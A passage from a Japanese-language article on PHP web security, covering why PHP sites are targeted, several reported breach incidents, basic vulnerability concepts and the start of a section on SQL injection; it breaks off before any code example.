\u73fe\u4ee3\u306eWeb\u30a2\u30d7\u30ea\u30b1\u30fc\u30b7\u30e7\u30f3\u958b\u767a\u306b\u304a\u3044\u3066\u3001\u30bb\u30ad\u30e5\u30ea\u30c6\u30a3\u306f\u6700\u3082\u91cd\u8981\u306a\u8981\u7d20\u306e\u4e00\u3064\u3067\u3059\u3002\u7279\u306bPHP\u306f\u4e16\u754c\u4e2d\u306e\u7d0479%\u306eWeb\u30b5\u30a4\u30c8\u3067\u4f7f\u7528\u3055\u308c\u3066\u3044\u308b\u305f\u3081\u3001\u305d\u306e\u8106\u5f31\u6027\u306f\u653b\u6483\u8005\u306b\u3068\u3063\u3066\u683c\u597d\u306e\u6a19\u7684\u3068\u306a\u3063\u3066\u3044\u307e\u3059\u3002<\/p>\n\n\n\n
2024\u5e74\u304b\u30892025\u5e74\u306b\u304b\u3051\u3066\u3001PHP\u30a2\u30d7\u30ea\u30b1\u30fc\u30b7\u30e7\u30f3\u3092\u72d9\u3063\u305f\u30bb\u30ad\u30e5\u30ea\u30c6\u30a3\u4fb5\u5bb3\u4e8b\u4ef6\u306f\u4f9d\u7136\u3068\u3057\u3066\u9ad8\u3044\u6c34\u6e96\u3092\u7dad\u6301\u3057\u3066\u304a\u308a\u3001\u7279\u306b\u30b5\u30d7\u30e9\u30a4\u30c1\u30a7\u30fc\u30f3\u653b\u6483\u3084API\u30bb\u30ad\u30e5\u30ea\u30c6\u30a3\u306b\u95a2\u9023\u3057\u305f\u65b0\u305f\u306a\u8105\u5a01\u304c\u51fa\u73fe\u3057\u3066\u3044\u307e\u3059\u3002\u3053\u3046\u3057\u305f\u72b6\u6cc1\u306b\u304a\u3044\u3066\u3001PHP\u306b\u3088\u308bWeb\u30a2\u30d7\u30ea\u30b1\u30fc\u30b7\u30e7\u30f3\u958b\u767a\u3067\u306f\u3001\u8106\u5f31\u6027\u3078\u306e\u5bfe\u7b56\u304c\u4ee5\u524d\u306b\u3082\u5897\u3057\u3066\u91cd\u8981\u306b\u306a\u3063\u3066\u3044\u307e\u3059\u3002<\/p>\n\n\n\n
\u672c\u8a18\u4e8b\u3067\u306f\u3001PHP\u30a2\u30d7\u30ea\u30b1\u30fc\u30b7\u30e7\u30f3\u306b\u304a\u3051\u308b9\u3064\u306e\u4e3b\u8981\u306a\u8106\u5f31\u6027\u3068\u305d\u306e\u5bfe\u7b56\u65b9\u6cd5\u3092\u3001\u5b9f\u8df5\u7684\u306a\u30b3\u30fc\u30c9\u4f8b\u3068\u3068\u3082\u306b\u89e3\u8aac\u3057\u307e\u3059\u3002SQL\u30a4\u30f3\u30b8\u30a7\u30af\u30b7\u30e7\u30f3\u3084\u30af\u30ed\u30b9\u30b5\u30a4\u30c8\u30b9\u30af\u30ea\u30d7\u30c6\u30a3\u30f3\u30b0\u306a\u3069\u306e\u57fa\u672c\u7684\u306a\u8106\u5f31\u6027\u304b\u3089\u3001\u3088\u308aPHP\u7279\u6709\u306e\u554f\u984c\u3067\u3042\u308b\u30d5\u30a1\u30a4\u30eb\u30a4\u30f3\u30af\u30eb\u30fc\u30c9\u8106\u5f31\u6027\u307e\u3067\u3001\u5305\u62ec\u7684\u306b\u53d6\u308a\u4e0a\u3052\u307e\u3059\u3002\u307e\u305f\u3001\u5358\u306a\u308b\u500b\u5225\u306e\u5bfe\u7b56\u3060\u3051\u3067\u306a\u304f\u3001\u30bb\u30ad\u30e5\u30ea\u30c6\u30a3\u3092\u7d99\u7d9a\u7684\u306b\u78ba\u4fdd\u3059\u308b\u305f\u3081\u306e\u4f53\u5236\u69cb\u7bc9\u3084\u3001\u6700\u65b0\u306e\u30bb\u30ad\u30e5\u30ea\u30c6\u30a3\u30c4\u30fc\u30eb\u3092\u6d3b\u7528\u3057\u305f\u691c\u8a3c\u65b9\u6cd5\u306b\u3064\u3044\u3066\u3082\u7d39\u4ecb\u3057\u307e\u3059\u3002<\/p>\n\n\n\n
\u3053\u308c\u3089\u306e\u77e5\u8b58\u3092\u8eab\u306b\u3064\u3051\u308b\u3053\u3068\u3067\u3001\u3088\u308a\u5b89\u5168\u306aPHP\u30a2\u30d7\u30ea\u30b1\u30fc\u30b7\u30e7\u30f3\u306e\u958b\u767a\u304c\u53ef\u80fd\u306b\u306a\u308a\u3001\u30bb\u30ad\u30e5\u30ea\u30c6\u30a3\u30a4\u30f3\u30b7\u30c7\u30f3\u30c8\u306b\u3088\u308b\u88ab\u5bb3\u3092\u672a\u7136\u306b\u9632\u3050\u3053\u3068\u304c\u3067\u304d\u308b\u3067\u3057\u3087\u3046\u3002PHP\u306b\u3088\u308b\u958b\u767a\u306b\u643a\u308f\u308b\u3059\u3079\u3066\u306e\u30a8\u30f3\u30b8\u30cb\u30a2\u306b\u3068\u3063\u3066\u3001\u5fc5\u9808\u306e\u77e5\u8b58\u3068\u306a\u308b\u306f\u305a\u3067\u3059\u3002<\/p>\n\n\n\n
\u76ee\u6b21 <\/p>\n
PHP\u304c\u653b\u6483\u8005\u304b\u3089\u7279\u306b\u72d9\u308f\u308c\u308b\u7406\u7531\u306f\u8907\u6570\u5b58\u5728\u3057\u3001\u3053\u308c\u3089\u304cPHP\u30a2\u30d7\u30ea\u30b1\u30fc\u30b7\u30e7\u30f3\u306e\u30bb\u30ad\u30e5\u30ea\u30c6\u30a3\u30ea\u30b9\u30af\u3092\u9ad8\u3081\u308b\u8981\u56e0\u3068\u306a\u3063\u3066\u3044\u307e\u3059\u3002<\/p>\n\n\n\n
W3Techs\u306e\u8abf\u67fb\u306b\u3088\u308c\u3070\u30012025\u5e74\u73fe\u5728\u3067\u3082\u30a4\u30f3\u30bf\u30fc\u30cd\u30c3\u30c8\u4e0a\u306eWeb\u30b5\u30a4\u30c8\u306e\u7d0479%\u304cPHP\u3092\u4f7f\u7528\u3057\u3066\u3044\u307e\u3059\u3002\u3053\u306e\u5e83\u7bc4\u306a\u666e\u53ca\u306b\u3088\u308a\u3001\u653b\u6483\u8005\u306f\u540c\u3058\u8106\u5f31\u6027\u3092\u6301\u3064\u591a\u6570\u306e\u30bf\u30fc\u30b2\u30c3\u30c8\u3092\u898b\u3064\u3051\u3084\u3059\u304f\u306a\u3063\u3066\u3044\u307e\u3059\u3002\u7279\u306bWordPress\uff08PHP\u30d9\u30fc\u30b9\uff09\u306f\u4e16\u754c\u4e2d\u306eWeb\u30b5\u30a4\u30c8\u306e40%\u4ee5\u4e0a\u3067\u4f7f\u7528\u3055\u308c\u3066\u304a\u308a\u3001\u5358\u4e00\u306e\u8106\u5f31\u6027\u3092\u60aa\u7528\u3059\u308b\u3053\u3068\u3067\u81a8\u5927\u306a\u6570\u306e\u30b5\u30a4\u30c8\u3092\u653b\u6483\u3067\u304d\u308b\u53ef\u80fd\u6027\u304c\u3042\u308a\u307e\u3059\u3002<\/p>\n\n\n\n
\u591a\u304f\u306e\u7d44\u7e54\u304c\u53e4\u3044PHP\u30d0\u30fc\u30b8\u30e7\u30f3\uff085.x\u30b7\u30ea\u30fc\u30ba\u306a\u3069\uff09\u3084\u30bb\u30ad\u30e5\u30ea\u30c6\u30a3\u30b5\u30dd\u30fc\u30c8\u304c\u7d42\u4e86\u3057\u305f\u30b7\u30b9\u30c6\u30e0\u3092\u4f7f\u3044\u7d9a\u3051\u3066\u3044\u307e\u3059\u30022024\u5e74\u306e\u8abf\u67fb\u3067\u306f\u3001Web\u30b5\u30a4\u30c8\u306e\u7d0415%\u304c\u30bb\u30ad\u30e5\u30ea\u30c6\u30a3\u30d1\u30c3\u30c1\u306e\u63d0\u4f9b\u304c\u7d42\u4e86\u3057\u305fPHP\u30d0\u30fc\u30b8\u30e7\u30f3\u3092\u4f7f\u7528\u3057\u3066\u3044\u308b\u3068\u3055\u308c\u3066\u3044\u307e\u3059\u3002\u3053\u308c\u3089\u306f\u65e2\u77e5\u306e\u8106\u5f31\u6027\u3092\u6301\u3061\u3001\u653b\u6483\u8005\u304c\u60aa\u7528\u3067\u304d\u308b\u72b6\u614b\u3067\u3059\u3002<\/p>\n\n\n\n
PHP\u306f\u5b66\u7fd2\u66f2\u7dda\u304c\u7de9\u3084\u304b\u3067\u3001\u521d\u5fc3\u8005\u3067\u3082\u6bd4\u8f03\u7684\u7c21\u5358\u306bWeb\u30a2\u30d7\u30ea\u30b1\u30fc\u30b7\u30e7\u30f3\u3092\u69cb\u7bc9\u3067\u304d\u307e\u3059\u3002\u3057\u304b\u3057\u3001\u3053\u308c\u306f\u30bb\u30ad\u30e5\u30ea\u30c6\u30a3\u77e5\u8b58\u304c\u4e0d\u5341\u5206\u306a\u958b\u767a\u8005\u306b\u3088\u308b\u8106\u5f31\u306a\u30b3\u30fc\u30c9\u304c\u91cf\u7523\u3055\u308c\u308b\u539f\u56e0\u306b\u3082\u306a\u3063\u3066\u3044\u307e\u3059\u3002\u591a\u304f\u306e\u5165\u9580\u30b5\u30a4\u30c8\u3084\u30c1\u30e5\u30fc\u30c8\u30ea\u30a2\u30eb\u3067\u306f\u3001\u30bb\u30ad\u30e5\u30ea\u30c6\u30a3\u3088\u308a\u3082\u6a5f\u80fd\u5b9f\u88c5\u3092\u512a\u5148\u3057\u305f\u4f8b\u304c\u793a\u3055\u308c\u308b\u3053\u3068\u3082\u5c11\u306a\u304f\u3042\u308a\u307e\u305b\u3093\u3002<\/p>\n\n\n\n
PHP\u306e\u30c7\u30d5\u30a9\u30eb\u30c8\u8a2d\u5b9a\u306f\u5229\u4fbf\u6027\u3092\u91cd\u8996\u3057\u3066\u304a\u308a\u3001\u5fc5\u305a\u3057\u3082\u30bb\u30ad\u30e5\u30ea\u30c6\u30a3\u304c\u6700\u512a\u5148\u3067\u306f\u3042\u308a\u307e\u305b\u3093\u3002\u4f8b\u3048\u3070\u3001\u4e00\u90e8\u306e\u5171\u6709\u30db\u30b9\u30c6\u30a3\u30f3\u30b0\u74b0\u5883\u3067\u306f\u3001 \u3053\u308c\u3089\u306e\u8981\u56e0\u304cPHP\u30a2\u30d7\u30ea\u30b1\u30fc\u30b7\u30e7\u30f3\u3092\u653b\u6483\u8005\u306b\u3068\u3063\u3066\u300c\u30b3\u30b9\u30c8\u30d1\u30d5\u30a9\u30fc\u30de\u30f3\u30b9\u306e\u9ad8\u3044\u300d\u30bf\u30fc\u30b2\u30c3\u30c8\u306b\u3057\u3066\u3044\u307e\u3059\u3002\u653b\u6483\u8005\u306f\u81ea\u52d5\u5316\u3055\u308c\u305f\u30b9\u30ad\u30e3\u30f3\u30c4\u30fc\u30eb\u3092\u4f7f\u7528\u3057\u3066\u5927\u91cf\u306ePHP\u30b5\u30a4\u30c8\u3092\u30b9\u30ad\u30e3\u30f3\u3057\u3001\u8106\u5f31\u6027\u3092\u6301\u3064\u30b5\u30a4\u30c8\u3092\u52b9\u7387\u7684\u306b\u7279\u5b9a\u3057\u3066\u653b\u6483\u3092\u4ed5\u639b\u3051\u3066\u3044\u307e\u3059\u3002<\/p>\n\n\n\n PHP\u306e\u8106\u5f31\u6027\u304c\u5f15\u304d\u8d77\u3053\u3057\u305f\u8fd1\u5e74\u306e\u5b9f\u969b\u306e\u88ab\u5bb3\u4e8b\u4f8b\u3092\u898b\u308b\u3053\u3068\u3067\u3001\u305d\u306e\u5371\u967a\u6027\u3068\u5f71\u97ff\u306e\u5927\u304d\u3055\u3092\u3088\u308a\u5177\u4f53\u7684\u306b\u7406\u89e3\u3067\u304d\u307e\u3059\u3002<\/p>\n\n\n\n WordPress\u306e\u4eba\u6c17\u5b66\u7fd2\u7ba1\u7406\u30b7\u30b9\u30c6\u30e0\u30d7\u30e9\u30b0\u30a4\u30f3\u300cLearnPress\u300d\u306bSQL\u30a4\u30f3\u30b8\u30a7\u30af\u30b7\u30e7\u30f3\u8106\u5f31\u6027\u304c\u767a\u898b\u3055\u308c\u307e\u3057\u305f\u3002\u3053\u306e\u8106\u5f31\u6027\u306b\u3088\u308a\u3001\u8a8d\u8a3c\u306a\u3057\u3067\u4efb\u610f\u306eSQL\u30af\u30a8\u30ea\u3092\u5b9f\u884c\u53ef\u80fd\u3068\u306a\u308a\u3001\u30c7\u30fc\u30bf\u30d9\u30fc\u30b9\u5185\u306e\u6a5f\u5bc6\u60c5\u5831\u306b\u30a2\u30af\u30bb\u30b9\u3067\u304d\u308b\u72b6\u614b\u3068\u306a\u308a\u307e\u3057\u305f\u3002\u4e16\u754c\u4e2d\u3067\u7d04200\u4e07\u30b5\u30a4\u30c8\u304c\u5f71\u97ff\u3092\u53d7\u3051\u3001\u4e00\u90e8\u306e\u30b5\u30a4\u30c8\u3067\u306f\u30e6\u30fc\u30b6\u30fc\u60c5\u5831\u304c\u6d41\u51fa\u3057\u307e\u3057\u305f\u3002\u3053\u306e\u4e8b\u4ef6\u306f\u3001\u5e83\u304f\u4f7f\u308f\u308c\u3066\u3044\u308b\u30d7\u30e9\u30b0\u30a4\u30f3\u306e\u8106\u5f31\u6027\u304c\u53ca\u307c\u3059\u5f71\u97ff\u306e\u5927\u304d\u3055\u3092\u793a\u3057\u3066\u3044\u307e\u3059\u3002<\/p>\n\n\n\n 2024\u5e74\u534a\u3070\u306b\u3001PHP\u30d9\u30fc\u30b9\u306eEC\u30d7\u30e9\u30c3\u30c8\u30d5\u30a9\u30fc\u30e0Magento\u306b\u5b58\u5728\u3057\u305f\u30d5\u30a1\u30a4\u30eb\u30a2\u30c3\u30d7\u30ed\u30fc\u30c9\u8106\u5f31\u6027\u3092\u60aa\u7528\u3057\u305f\u5927\u898f\u6a21\u653b\u6483\u304c\u767a\u751f\u3057\u307e\u3057\u305f\u3002\u653b\u6483\u8005\u306f\u3053\u306e\u8106\u5f31\u6027\u3092\u5229\u7528\u3057\u3066Web\u30b5\u30a4\u30c8\u306b\u4e0d\u6b63\u306a\u30b9\u30af\u30ea\u30d7\u30c8\u3092\u57cb\u3081\u8fbc\u307f\u3001\u6570\u5343\u306eEC\u30b5\u30a4\u30c8\u304b\u3089\u9867\u5ba2\u306e\u30af\u30ec\u30b8\u30c3\u30c8\u30ab\u30fc\u30c9\u60c5\u5831\u3092\u7a83\u53d6\u3057\u307e\u3057\u305f\u3002\u88ab\u5bb3\u7dcf\u984d\u306f\u63a8\u5b9a\u306730\u5104\u5186\u4ee5\u4e0a\u306b\u9054\u3057\u3001\u591a\u304f\u306e\u4e2d\u5c0f\u4f01\u696d\u304c\u6df1\u523b\u306a\u4fe1\u983c\u55aa\u5931\u306b\u76f4\u9762\u3057\u307e\u3057\u305f\u3002<\/p>\n\n\n\n 2025\u5e74\u521d\u982d\u3001\u4eba\u6c17\u306ePHP\u30d5\u30ec\u30fc\u30e0\u30ef\u30fc\u30afLaravel\u306e\u7279\u5b9a\u30d0\u30fc\u30b8\u30e7\u30f3\u306b\u5b58\u5728\u3057\u305fCSRF\u4fdd\u8b77\u306e\u4e0d\u5099\u304c\u539f\u56e0\u3067\u3001\u8907\u6570\u306e\u4f01\u696d\u306eWeb\u30a2\u30d7\u30ea\u30b1\u30fc\u30b7\u30e7\u30f3\u3067\u8a8d\u8a3c\u30d0\u30a4\u30d1\u30b9\u304c\u53ef\u80fd\u306b\u306a\u308b\u8106\u5f31\u6027\u304c\u60aa\u7528\u3055\u308c\u307e\u3057\u305f\u3002\u653b\u6483\u8005\u306f\u7ba1\u7406\u8005\u30a2\u30ab\u30a6\u30f3\u30c8\u306b\u4e0d\u6b63\u30a2\u30af\u30bb\u30b9\u3057\u3001\u5185\u90e8\u30c7\u30fc\u30bf\u3092\u7a83\u53d6\u3002\u7279\u306b\u5f71\u97ff\u3092\u53d7\u3051\u305f\u91d1\u878d\u30c6\u30af\u30ce\u30ed\u30b8\u30fc\u4f01\u696d\u306e\u4e00\u793e\u3067\u306f\u3001\u7d041\u5104\u5186\u76f8\u5f53\u306e\u6697\u53f7\u8cc7\u7523\u304c\u6d41\u51fa\u3059\u308b\u4e8b\u614b\u3068\u306a\u308a\u307e\u3057\u305f\u3002<\/p>\n\n\n\n 2024\u5e74\u5f8c\u534a\u3001PHP\u306e\u30e6\u30cb\u30c3\u30c8\u30c6\u30b9\u30c8\u30d5\u30ec\u30fc\u30e0\u30ef\u30fc\u30af\u306e\u4f9d\u5b58\u30e9\u30a4\u30d6\u30e9\u30ea\u306b\u60aa\u610f\u306e\u3042\u308b\u30b3\u30fc\u30c9\u304c\u4ed5\u8fbc\u307e\u308c\u308b\u4e8b\u4ef6\u304c\u767a\u751f\u3057\u307e\u3057\u305f\u3002\u3053\u306e\u653b\u6483\u306f\u3001\u6b63\u898f\u306e\u958b\u767a\u8005\u306e\u30a2\u30ab\u30a6\u30f3\u30c8\u304c\u4fb5\u5bb3\u3055\u308c\u305f\u3053\u3068\u3067\u5b9f\u884c\u3055\u308c\u3001\u611f\u67d3\u3057\u305f\u30e9\u30a4\u30d6\u30e9\u30ea\u3092\u30a4\u30f3\u30b9\u30c8\u30fc\u30eb\u3057\u305f\u958b\u767a\u74b0\u5883\u304b\u3089\u672c\u756a\u74b0\u5883\u3078\u306e\u30d0\u30c3\u30af\u30c9\u30a2\u304c\u4f5c\u6210\u3055\u308c\u307e\u3057\u305f\u3002\u591a\u6570\u306e\u30c6\u30c3\u30af\u4f01\u696d\u304c\u3053\u306e\u653b\u6483\u306e\u5f71\u97ff\u3092\u53d7\u3051\u3001\u5e73\u5747\u306772\u6642\u9593\u306e\u30b7\u30b9\u30c6\u30e0\u30c0\u30a6\u30f3\u30bf\u30a4\u30e0\u304c\u767a\u751f\u3057\u307e\u3057\u305f\u3002<\/p>\n\n\n\n \u3053\u308c\u3089\u306e\u4e8b\u4f8b\u306f\u3001PHP\u30a2\u30d7\u30ea\u30b1\u30fc\u30b7\u30e7\u30f3\u306e\u8106\u5f31\u6027\u304c\u5358\u306a\u308b\u6280\u8853\u7684\u554f\u984c\u3067\u306f\u306a\u304f\u3001\u91cd\u5927\u306a\u7d4c\u6e08\u7684\u640d\u5931\u3001\u4fe1\u983c\u306e\u55aa\u5931\u3001\u6cd5\u7684\u8cac\u4efb\u3001\u305d\u3057\u3066\u6642\u306b\u306f\u4f01\u696d\u306e\u5b58\u7d9a\u306b\u3055\u3048\u5f71\u97ff\u3092\u53ca\u307c\u3059\u53ef\u80fd\u6027\u304c\u3042\u308b\u3053\u3068\u3092\u793a\u3057\u3066\u3044\u307e\u3059\u3002\u9069\u5207\u306a\u30bb\u30ad\u30e5\u30ea\u30c6\u30a3\u5bfe\u7b56\u306e\u5b9f\u65bd\u306f\u3001\u5358\u306a\u308b\u30aa\u30d7\u30b7\u30e7\u30f3\u3067\u306f\u306a\u304f\u5fc5\u9808\u306e\u53d6\u308a\u7d44\u307f\u3068\u3044\u3048\u308b\u3067\u3057\u3087\u3046\u3002<\/p>\n\n\n\n \u8106\u5f31\u6027\uff08Vulnerability\uff09\u3068\u306f\u3001\u30b7\u30b9\u30c6\u30e0\u306e\u30bb\u30ad\u30e5\u30ea\u30c6\u30a3\u3092\u640d\u306a\u3046\u53ef\u80fd\u6027\u306e\u3042\u308b\u6b20\u9665\u3084\u5f31\u70b9\u306e\u3053\u3068\u3067\u3059\u3002\u5177\u4f53\u7684\u306b\u306f\u3001\u653b\u6483\u8005\u304c\u30b7\u30b9\u30c6\u30e0\u306b\u4e0d\u6b63\u30a2\u30af\u30bb\u30b9\u3057\u305f\u308a\u3001\u30c7\u30fc\u30bf\u3092\u6f0f\u6d29\u3055\u305b\u305f\u308a\u3001\u30b5\u30fc\u30d3\u30b9\u3092\u59a8\u5bb3\u3057\u305f\u308a\u3059\u308b\u305f\u3081\u306b\u60aa\u7528\u3067\u304d\u308b\u72b6\u614b\u3084\u6761\u4ef6\u3092\u6307\u3057\u307e\u3059\u3002<\/p>\n\n\n\n \u8106\u5f31\u6027\u304c\u767a\u751f\u3059\u308b\u6839\u672c\u7684\u306a\u539f\u56e0\u306f\u3001\u4e3b\u306b\u4ee5\u4e0b\u306e3\u3064\u306b\u5206\u985e\u3067\u304d\u307e\u3059\uff1a<\/p>\n\n\n\n \u30bb\u30ad\u30e5\u30ea\u30c6\u30a3\u8981\u4ef6\u3092\u8003\u616e\u305b\u305a\u306b\u30b7\u30b9\u30c6\u30e0\u3092\u8a2d\u8a08\u3057\u305f\u5834\u5408\u306b\u751f\u3058\u307e\u3059\u3002\u4f8b\u3048\u3070\u3001PHP\u30a2\u30d7\u30ea\u30b1\u30fc\u30b7\u30e7\u30f3\u3067\u30e6\u30fc\u30b6\u30fc\u8a8d\u8a3c\u6a5f\u80fd\u3092\u8a2d\u8a08\u3059\u308b\u969b\u306b\u3001\u30d1\u30b9\u30ef\u30fc\u30c9\u30ea\u30bb\u30c3\u30c8\u6a5f\u80fd\u306e\u30bb\u30ad\u30e5\u30ea\u30c6\u30a3\u3092\u8003\u616e\u3057\u3066\u3044\u306a\u3051\u308c\u3070\u3001\u653b\u6483\u8005\u306b\u30a2\u30ab\u30a6\u30f3\u30c8\u3092\u4e57\u3063\u53d6\u3089\u308c\u308b\u53ef\u80fd\u6027\u304c\u3042\u308a\u307e\u3059\u3002<\/p>\n\n\n\n \u8a2d\u8a08\u306f\u9069\u5207\u3067\u3082\u3001\u30b3\u30fc\u30c7\u30a3\u30f3\u30b0\u6bb5\u968e\u3067\u306e\u30df\u30b9\u306b\u3088\u308a\u767a\u751f\u3057\u307e\u3059\u3002\u4f8b\u3048\u3070\u3001SQL\u30af\u30a8\u30ea\u5b9f\u884c\u524d\u306b\u30e6\u30fc\u30b6\u30fc\u5165\u529b\u3092\u9069\u5207\u306b\u691c\u8a3c\u30fb\u30a8\u30b9\u30b1\u30fc\u30d7\u3057\u306a\u3044\u5834\u5408\u3001SQL\u30a4\u30f3\u30b8\u30a7\u30af\u30b7\u30e7\u30f3\u8106\u5f31\u6027\u304c\u751f\u3058\u307e\u3059\u3002<\/p>\n\n\n\n \u30b7\u30b9\u30c6\u30e0\u306e\u8a2d\u5b9a\u30df\u30b9\u3084\u66f4\u65b0\u306e\u6020\u308a\u306b\u3088\u308b\u8106\u5f31\u6027\u3067\u3059\u3002\u4f8b\u3048\u3070\u3001\u672c\u756a\u74b0\u5883\u3067PHP\u306e\u30a8\u30e9\u30fc\u8868\u793a\u3092\u6709\u52b9\u306b\u3057\u305f\u307e\u307e\u306b\u3059\u308b\u3068\u3001\u653b\u6483\u8005\u306b\u5185\u90e8\u60c5\u5831\u304c\u6f0f\u6d29\u3059\u308b\u53ef\u80fd\u6027\u304c\u3042\u308a\u307e\u3059\u3002<\/p>\n\n\n\n \u8106\u5f31\u6027\u306f\u3001\u305d\u306e\u7279\u6027\u3084\u5f71\u97ff\u5ea6\u306b\u3088\u3063\u3066\u5171\u901a\u8106\u5f31\u6027\u8a55\u4fa1\u30b7\u30b9\u30c6\u30e0\uff08CVSS\uff09\u306a\u3069\u3067\u8a55\u4fa1\u3055\u308c\u3001\u6df1\u523b\u5ea6\u304c\u5224\u65ad\u3055\u308c\u307e\u3059\u3002\u307e\u305f\u3001\u5171\u901a\u8106\u5f31\u6027\u8b58\u5225\u5b50\uff08CVE\uff09\u306b\u3088\u3063\u3066\u4e00\u610f\u306b\u8b58\u5225\u3055\u308c\u7ba1\u7406\u3055\u308c\u3066\u3044\u307e\u3059\u3002<\/p>\n\n\n\n PHP\u30a2\u30d7\u30ea\u30b1\u30fc\u30b7\u30e7\u30f3\u306b\u304a\u3051\u308b\u8106\u5f31\u6027\u306f\u3001\u591a\u304f\u306e\u5834\u5408\u300c\u30e6\u30fc\u30b6\u30fc\u5165\u529b\u306e\u4e0d\u9069\u5207\u306a\u51e6\u7406\u300d\u304c\u6839\u672c\u539f\u56e0\u3068\u306a\u3063\u3066\u3044\u307e\u3059\u3002Web\u30a2\u30d7\u30ea\u30b1\u30fc\u30b7\u30e7\u30f3\u306f\u5916\u90e8\u304b\u3089\u306e\u5165\u529b\u3092\u5e38\u306b\u53d7\u3051\u4ed8\u3051\u308b\u305f\u3081\u3001\u305d\u306e\u5165\u529b\u3092\u9069\u5207\u306b\u691c\u8a3c\u30fb\u30b5\u30cb\u30bf\u30a4\u30ba\u30fb\u30a8\u30b9\u30b1\u30fc\u30d7\u3057\u306a\u3044\u3053\u3068\u3067\u3001\u69d8\u3005\u306a\u7a2e\u985e\u306e\u8106\u5f31\u6027\u304c\u751f\u307e\u308c\u308b\u306e\u3067\u3059\u3002<\/p>\n\n\n\n \u8106\u5f31\u6027\u306b\u5bfe\u3059\u308b\u9632\u5fa1\u306e\u57fa\u672c\u539f\u5247\u306f\u300c\u6df1\u5c64\u9632\u5fa1\u300d\u3067\u3059\u3002\u3053\u308c\u306f\u5358\u4e00\u306e\u9632\u5fa1\u7b56\u306b\u983c\u308b\u306e\u3067\u306f\u306a\u304f\u3001\u8907\u6570\u306e\u5c64\u3067\u30bb\u30ad\u30e5\u30ea\u30c6\u30a3\u5bfe\u7b56\u3092\u8b1b\u3058\u308b\u3053\u3068\u3067\u3001\u4e00\u3064\u306e\u5bfe\u7b56\u304c\u7834\u3089\u308c\u3066\u3082\u4ed6\u306e\u5bfe\u7b56\u3067\u30b7\u30b9\u30c6\u30e0\u3092\u9632\u5fa1\u3067\u304d\u308b\u3088\u3046\u306b\u3059\u308b\u8003\u3048\u65b9\u3067\u3059\u3002<\/p>\n\n\n\n PHP\u306b\u306f\u4ed6\u306e\u30d7\u30ed\u30b0\u30e9\u30df\u30f3\u30b0\u8a00\u8a9e\u3068\u6bd4\u8f03\u3057\u305f\u5834\u5408\u3001\u72ec\u7279\u306e\u7279\u5fb4\u304c\u3042\u308a\u3001\u305d\u308c\u304c\u8106\u5f31\u6027\u306e\u767a\u751f\u30d1\u30bf\u30fc\u30f3\u306b\u3082\u5f71\u97ff\u3092\u4e0e\u3048\u3066\u3044\u307e\u3059\u3002<\/p>\n\n\n\n PHP\u306f1994\u5e74\u306b\u500b\u4eba\u30d7\u30ed\u30b8\u30a7\u30af\u30c8\u3068\u3057\u3066\u59cb\u307e\u308a\u3001\u5f53\u521d\u306f\u30bb\u30ad\u30e5\u30ea\u30c6\u30a3\u3088\u308a\u3082\u300c\u9ad8\u901f\u306b\u52d5\u4f5c\u3059\u308bWeb\u30da\u30fc\u30b8\u3092\u7c21\u5358\u306b\u4f5c\u308c\u308b\u300d\u3053\u3068\u3092\u91cd\u8996\u3057\u3066\u8a2d\u8a08\u3055\u308c\u307e\u3057\u305f\u3002\u3053\u306e\u6b74\u53f2\u7684\u80cc\u666f\u304b\u3089\u3001\u4ee5\u4e0b\u306e\u3088\u3046\u306a\u7279\u5fb4\u304c\u3042\u308a\u307e\u3059\uff1a<\/p>\n\n\n\n PHP 7.x\u304a\u3088\u30738.x\u30b7\u30ea\u30fc\u30ba\u3067\u306f\u3001\u591a\u304f\u306e\u30bb\u30ad\u30e5\u30ea\u30c6\u30a3\u6539\u5584\u304c\u884c\u308f\u308c\u3066\u3044\u307e\u3059\uff1a<\/p>\n\n\n\n \u3057\u304b\u3057\u3001\u6700\u65b0\u306ePHP\u3092\u4f7f\u7528\u3057\u3066\u3044\u3066\u3082\u3001\u8a00\u8a9e\u8a2d\u8a08\u306e\u7279\u6027\u306b\u8d77\u56e0\u3059\u308b\u6f5c\u5728\u7684\u306a\u8106\u5f31\u6027\u30ea\u30b9\u30af\u306f\u5b58\u5728\u3059\u308b\u305f\u3081\u3001PHP\u30d7\u30ed\u30b0\u30e9\u30de\u306f\u30bb\u30ad\u30e5\u30ea\u30c6\u30a3\u3092\u5e38\u306b\u610f\u8b58\u3057\u305f\u30b3\u30fc\u30c7\u30a3\u30f3\u30b0\u304c\u6c42\u3081\u3089\u308c\u307e\u3059\u3002\u307e\u305f\u3001PHP\u81ea\u4f53\u306e\u554f\u984c\u3068\u3044\u3046\u3088\u308a\u3082\u3001\u305d\u308c\u3092\u4f7f\u7528\u3059\u308b\u958b\u767a\u8005\u306e\u30bb\u30ad\u30e5\u30ea\u30c6\u30a3\u77e5\u8b58\u4e0d\u8db3\u304c\u6700\u5927\u306e\u8106\u5f31\u6027\u8981\u56e0\u3068\u306a\u3063\u3066\u3044\u307e\u3059\u3002<\/p>\n\n\n\n SQL\u30a4\u30f3\u30b8\u30a7\u30af\u30b7\u30e7\u30f3\u306f\u3001\u6700\u3082\u4e00\u822c\u7684\u304b\u3064\u5371\u967a\u306aWeb\u30a2\u30d7\u30ea\u30b1\u30fc\u30b7\u30e7\u30f3\u8106\u5f31\u6027\u306e\u4e00\u3064\u3067\u3059\u3002\u653b\u6483\u8005\u304cSQL\u30af\u30a8\u30ea\u306e\u69cb\u9020\u3092\u6539\u5909\u3057\u3001\u30c7\u30fc\u30bf\u30d9\u30fc\u30b9\u306b\u5bfe\u3057\u3066\u4e0d\u6b63\u306a\u64cd\u4f5c\u3092\u884c\u3046\u3053\u3068\u3092\u53ef\u80fd\u306b\u3057\u307e\u3059\u3002<\/p>\n\n\n\n SQL\u30a4\u30f3\u30b8\u30a7\u30af\u30b7\u30e7\u30f3\u306f\u3001\u30e6\u30fc\u30b6\u30fc\u5165\u529b\u5024\u304cSQL\u6587\u306b\u76f4\u63a5\u7d50\u5408\u3055\u308c\u308b\u3053\u3068\u3067\u767a\u751f\u3057\u307e\u3059\u3002\u4ee5\u4e0b\u306e\u3088\u3046\u306aPHP\u30b3\u30fc\u30c9\u304c\u8106\u5f31\u6027\u3092\u6301\u3061\u307e\u3059\uff1a<\/p>\n\n\n\n \u653b\u6483\u8005\u304c\u5165\u529b\u30d5\u30a3\u30fc\u30eb\u30c9\u306b 